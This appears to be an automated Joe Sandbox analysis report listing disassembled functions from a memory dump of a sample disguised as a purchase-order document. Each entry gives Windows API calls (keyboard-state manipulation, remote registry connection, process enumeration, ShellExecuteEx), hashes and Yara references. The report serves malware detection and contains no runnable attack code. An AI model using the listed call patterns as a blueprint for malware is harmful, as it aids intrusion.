Opcode ID: 95001eb6d8d06d897afce0aca893f4b7651020868193ca3a80220c39ecb6f9c3
Instruction ID: 97d09e0af2b4d046480d7fb626e7fa0667c22e7462995616ff61acde959b3bac
Opcode Fuzzy Hash: 95001eb6d8d06d897afce0aca893f4b7651020868193ca3a80220c39ecb6f9c3
Instruction Fuzzy Hash: 747118F15083015AD714DF65C881B6BB7E4EB98396F04491FFD8082292D7BCDA4CC7AA

Function 0047395A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 227COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?), ref: 00473A00
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00473A0E
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00473A34
CloseHandle.KERNEL32(00000000,00000000,?,00000028), ref: 00473C01

Strings

HH, xrefs: 00473999

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID: HH
API String ID: 3488606520-2761332787
Opcode ID: 12402d889b8d2545f97f81e579d11a3e1d05628ef8a47b4e2ac7d1c45517ac81
Instruction ID: 2161edc7e7eefe464b48455ffcea7dd3157e2cbe85e131cccd8837112284b0a3
Opcode Fuzzy Hash: 12402d889b8d2545f97f81e579d11a3e1d05628ef8a47b4e2ac7d1c45517ac81
Instruction Fuzzy Hash: 3581BF71A043019FD320EF69C882B5BF7E4AF84744F108C2EF598AB392D675E945CB96

Function 004472C8 Relevance: 10.7, APIs: 7, Instructions: 207COMMON

Download Yara Rule

APIs

Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC

Ellipse.GDI32(?,?,?,00000000), ref: 00447463
MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
LineTo.GDI32(?,?), ref: 004474BF
CloseFigure.GDI32(?), ref: 004474C6
SetPixel.GDI32(?,?,?,?), ref: 004474D6
Rectangle.GDI32(?,?), ref: 004474F3

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
String ID:
API String ID: 4082120231-0
Opcode ID: 3e823f4574af11f26be8c20bd8771cfecf2a7ea1363ae8038588c787c8c49515
Instruction ID: e2e17d079c8faeb919f1a119f9aa9df975eabc7d00289576b12f70c1741c819b
Opcode Fuzzy Hash: 3e823f4574af11f26be8c20bd8771cfecf2a7ea1363ae8038588c787c8c49515
Instruction Fuzzy Hash: BC713AB11083419FD300DF15C884E6BBBE9EFC9708F148A1EF99497351D778A906CBAA

Function 00447303 Relevance: 10.7, APIs: 7, Instructions: 192COMMON

Download Yara Rule

APIs

Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC

Ellipse.GDI32(?,?,?,00000000), ref: 00447463
MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
LineTo.GDI32(?,?), ref: 004474BF
CloseFigure.GDI32(?), ref: 004474C6
SetPixel.GDI32(?,?,?,?), ref: 004474D6
Rectangle.GDI32(?,?), ref: 004474F3

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
String ID:
API String ID: 4082120231-0
Opcode ID: bd92991fb0a59d5160a547c0af993f50d26037df712543aebae1afc8709768cb
Instruction ID: 71053adf7dd607ae91079c2ca5de7ffea4483cc305881a9741cc2e8bc8d6f2cf
Opcode Fuzzy Hash: bd92991fb0a59d5160a547c0af993f50d26037df712543aebae1afc8709768cb
Instruction Fuzzy Hash: 55613BB51083419FD300DF55CC84E6BBBE9EBC9308F148A1EF99597351D738A906CB6A

Function 0044733D Relevance: 10.7, APIs: 7, Instructions: 177COMMON

Download Yara Rule

APIs

Ellipse.GDI32(?,?,?,00000000), ref: 00447463
MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
LineTo.GDI32(?,?), ref: 004474BF
CloseFigure.GDI32(?), ref: 004474C6
SetPixel.GDI32(?,?,?,?), ref: 004474D6
Rectangle.GDI32(?,?), ref: 004474F3

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: AngleCloseEllipseFigureLineMovePixelRectangle
String ID:
API String ID: 288456094-0
Opcode ID: d308d32173f93e4cd5527eec6d709d72f3e0fef6f2bd509874fda6c33d0c9603
Instruction ID: d3db7697bfba14f4a3ad6627a8a5faa1010559558ae5e3f89cc6b0bd66950af4
Opcode Fuzzy Hash: d308d32173f93e4cd5527eec6d709d72f3e0fef6f2bd509874fda6c33d0c9603
Instruction Fuzzy Hash: 90514BB51082419FD300DF15CC84E6BBBE9EFC9308F14891EF99497351D734A906CB6A

Function 0044496C Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 004449B0
GetKeyboardState.USER32(?), ref: 004449C3
SetKeyboardState.USER32(?), ref: 00444A0F
PostMessageW.USER32(?,00000101,00000010,?), ref: 00444A3F
PostMessageW.USER32(?,00000101,00000011,?), ref: 00444A60
PostMessageW.USER32(?,00000101,00000012,?), ref: 00444AAC
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444AD1

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: d47ceab968b999e6d4944081d81f2373d9ea27f049f07d95c13b51a59d3cc885
Instruction ID: 19c159416ad4887e81d4090d30fbb5c505c675cee05c330e2fd8e115592bd25d
Opcode Fuzzy Hash: d47ceab968b999e6d4944081d81f2373d9ea27f049f07d95c13b51a59d3cc885
Instruction Fuzzy Hash: B651C5A05487D139F7369234884ABA7BFD55F8A304F08CA4EF1E5156C3D2ECE984C769

Function 00444B65 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00444BA9
GetKeyboardState.USER32(?), ref: 00444BBC
SetKeyboardState.USER32(?), ref: 00444C08
PostMessageW.USER32(?,00000100,00000010,?), ref: 00444C35
PostMessageW.USER32(?,00000100,00000011,?), ref: 00444C53
PostMessageW.USER32(?,00000100,00000012,?), ref: 00444C9C
PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444CBE

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: de9aba9e896a2e755c79cba499ec14fd455f1b60db9a9f79a8626ad1a28ad6a0
Instruction ID: 4493abccadab05ae7d00f733e1fa63583af0c494729619d74f1516a50adc8d80
Opcode Fuzzy Hash: de9aba9e896a2e755c79cba499ec14fd455f1b60db9a9f79a8626ad1a28ad6a0
Instruction Fuzzy Hash: A951E4F05097D139F7369364884ABA7BFE46F8A304F088A4EF1D5065C2D2ACE984C769

Function 004498BD Relevance: 10.7, APIs: 7, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2552f041a71837ba3affbc4ec308d2b7aa0755a9e2dfe05148a880b05b5b76bf
Instruction ID: b3b3da583a0ae8cfa3180eda0e634cae40a493ebdfd517dbec9d2fd4fbd82cb1
Opcode Fuzzy Hash: 2552f041a71837ba3affbc4ec308d2b7aa0755a9e2dfe05148a880b05b5b76bf
Instruction Fuzzy Hash: 1E513A315082909FE321CF14DC89FABBB64FB46320F18456FF895AB2D1D7649C06D7AA

Function 0046A98D Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 158registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AA77

Strings

HH, xrefs: 0046A9CE

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: ConnectRegistry_wcslen
String ID: HH
API String ID: 535477410-2761332787
Opcode ID: a31a44ff546351b1de52d8f34745bf25342c9426a619c9766caf2b0061db1f75
Instruction ID: 7b41397762752e7dec08e47bcdb2cb2f58790b6f4670524580eb9da3090621e6
Opcode Fuzzy Hash: a31a44ff546351b1de52d8f34745bf25342c9426a619c9766caf2b0061db1f75
Instruction Fuzzy Hash: A2516D71208301AFD304EF65C981F5BB7A9BFC4704F40892EF685A7291D678E905CB6B

Function 00457C08 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 158COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00457C34
_memset.LIBCMT ref: 00457CE8
ShellExecuteExW.SHELL32(?), ref: 00457D34

Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012

CloseHandle.KERNEL32(?), ref: 00457DDD

Strings

<, xrefs: 00457CF4
@, xrefs: 00457CFC

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: _memset$CloseExecuteHandleShell_wcscpy_wcslen
String ID: <$@
API String ID: 1325244542-1426351568
Opcode ID: bce0cc86945754dfb230170ecd4c21a915d6526e7c9b1e7fd723952314da78dd
Instruction ID: 09e461bdfc47c8bdd671eddb31188d347eda7c51057725e13e77015b5001baed
Opcode Fuzzy Hash: bce0cc86945754dfb230170ecd4c21a915d6526e7c9b1e7fd723952314da78dd
Instruction Fuzzy Hash: EA510FB55083009FC710EF61D985A5BB7E4AF84709F00492EFD44AB392DB39ED48CB9A

Function 0047375F Relevance: 10.6, APIs: 7, Instructions: 150processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(?,?,?,?,?,?,?,?,?,00000002,00000000,00000014), ref: 0047379B
Process32FirstW.KERNEL32(00000000,?), ref: 004737A8
__wsplitpath.LIBCMT ref: 004737E1

Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2

_wcscat.LIBCMT ref: 004737F6
__wcsicoll.LIBCMT ref: 00473818
Process32NextW.KERNEL32(00000000,?), ref: 00473844
CloseHandle.KERNEL32(00000000,00000000,?,?), ref: 00473852

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
String ID:
API String ID: 2547909840-0
Opcode ID: 1dcf289f501924a5df592eae16a0ec0030d5246948486ec38c60cdc62178aa5b
Instruction ID: 8efa427203ffd7a45d167e3a64f6abf3f3640219bb0751621114887cb14f0fc1
Opcode Fuzzy Hash: 1dcf289f501924a5df592eae16a0ec0030d5246948486ec38c60cdc62178aa5b
Instruction Fuzzy Hash: 4751BB71544304A7D720EF61CC86FDBB3E8AF84748F00492EF58957182E775E645C7AA

Function 00455297 Relevance: 10.6, APIs: 7, Instructions: 149windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001308,?,00000000), ref: 004552B7
ImageList_Remove.COMCTL32(?,?,?,?), ref: 004552EB
SendMessageW.USER32(?,0000133D,?,00000002), ref: 004553D3
DeleteObject.GDI32(?), ref: 0045564E
DeleteObject.GDI32(?), ref: 0045565C
DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
DestroyWindow.USER32(?,?,?,?,?), ref: 00455678

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
String ID:
API String ID: 2354583917-0
Opcode ID: b44580b005306b3b7f9b1dbab51831616e075f248f5ed84087b7c105bb41b1f9
Instruction ID: 19c5dc8500d05a42ca126c51664c70dafe1d1a8ca3b523478e8997b137d6e309
Opcode Fuzzy Hash: b44580b005306b3b7f9b1dbab51831616e075f248f5ed84087b7c105bb41b1f9
Instruction Fuzzy Hash: 77519D30204A419FC714DF24C4A4B7A77E5FB49301F4486AEFD9ACB392DB78A849CB54

Function 0047762A Relevance: 10.6, APIs: 7, Instructions: 140windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51

GetMenu.USER32 ref: 004776AA
GetMenuItemCount.USER32(00000000), ref: 004776CC
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 004776FB
_wcslen.LIBCMT ref: 0047771A

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Menu$CountItemStringWindow_wcslen
String ID:
API String ID: 1823500076-0
Opcode ID: 3c1e0179b5075f45df12b398ec391808b8d2f1e7a16a5d1bec5683dd9427006f
Instruction ID: 4b9e656becebfc5f52f27a1d7ad2c07a58398098864d75d3a5ce1c02cc274359
Opcode Fuzzy Hash: 3c1e0179b5075f45df12b398ec391808b8d2f1e7a16a5d1bec5683dd9427006f
Instruction Fuzzy Hash: 174117715083019FD320EF25CC45BABB3E8BF88314F10492EF55997252D7B8E9458BA9

Function 00448877 Relevance: 10.6, APIs: 7, Instructions: 130windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0044890A
SendMessageW.USER32(?,00000469,?,00000000), ref: 00448920
EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
EnableWindow.USER32(004A83D8,00000001), ref: 00448C58

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Window$Enable$Show$MessageMoveSend
String ID:
API String ID: 896007046-0
Opcode ID: 440e8810410bf42a4c8e03fd117b8fd843bde7e89b0e2674ab81ad81c9f8ea0f
Instruction ID: 0809a8548e22334437b8974569d6adfa08582830463fbdb99c3481629354d751
Opcode Fuzzy Hash: 440e8810410bf42a4c8e03fd117b8fd843bde7e89b0e2674ab81ad81c9f8ea0f
Instruction Fuzzy Hash: 63419E746043419FF7248B24C884B6FB7A1FB99305F18886EF98197391DA78A845CB59

Function 004413F0 Relevance: 10.6, APIs: 7, Instructions: 114windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044140E
GetWindowLongW.USER32(?,000000F0), ref: 00441452
GetWindowLongW.USER32(?,000000F0), ref: 00441493
SendMessageW.USER32(016A1A90,000000F1,00000000,00000000), ref: 004414C6
SendMessageW.USER32(016A1A90,000000F1,00000001,00000000), ref: 004414F1

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: ed470013e842d905752aa6f8daaa5f1d8e955df317e7b96a507e5c494099af20
Instruction ID: f6a862a32ccfd92e4f153a1965fa7dc80102ffdb8abe4b8a046001f82176c48d
Opcode Fuzzy Hash: ed470013e842d905752aa6f8daaa5f1d8e955df317e7b96a507e5c494099af20
Instruction Fuzzy Hash: 2F416A347442019FE720CF58DCC4F6A77A5FB8A754F24416AE5519B3B1CB75AC82CB48

Function 0044849C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 106windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004484C4
GetMenuItemInfoW.USER32(?,?,00000000,004A83D8), ref: 00448562
IsMenu.USER32(?), ref: 0044857B
InsertMenuItemW.USER32(?,?,00000001,004A83D8), ref: 004485D0
DrawMenuBar.USER32 ref: 004485E4

Strings

0, xrefs: 004484BC

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: 42a201a1e731261e29c9ff9b40de176b55a78da0b06957c9f64dc5096dc7767a
Instruction ID: c1b4c65bd9dbf201e14e83578cc8030a3c247867dd5f1e451e409e2153a24926
Opcode Fuzzy Hash: 42a201a1e731261e29c9ff9b40de176b55a78da0b06957c9f64dc5096dc7767a
Instruction Fuzzy Hash: 9F417F75604341AFE710CF45C984B6BB7E4FB89304F14881EFA554B391DBB4E849CB5A

Function 0047244D Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104sleepCOMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32 ref: 0047247C
InterlockedDecrement.KERNEL32(004A7CAC), ref: 00472491
Sleep.KERNEL32(0000000A), ref: 00472499
InterlockedIncrement.KERNEL32(004A7CAC), ref: 004724A4
InterlockedDecrement.KERNEL32(004A7CAC), ref: 00472599

Strings

0vH, xrefs: 004724D5, 00472505, 00472529, 00472561

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Interlocked$DecrementIncrement$Sleep
String ID: 0vH
API String ID: 327565842-3662162768
Opcode ID: bfb173672284e31ba0a3017bb0c7d670cf276827bd066f711b3c3b49063f60eb
Instruction ID: 7246262c18bb701d5349304b0e2d21290bf7c9637501dd5a114e6955e8e78370
Opcode Fuzzy Hash: bfb173672284e31ba0a3017bb0c7d670cf276827bd066f711b3c3b49063f60eb
Instruction Fuzzy Hash: 9631D2329082259BD710DF28DD41A8A77A5EB95324F05483EFD08FB251DB78EC498BED

Function 00448AFF Relevance: 10.6, APIs: 7, Instructions: 98windowCOMMON

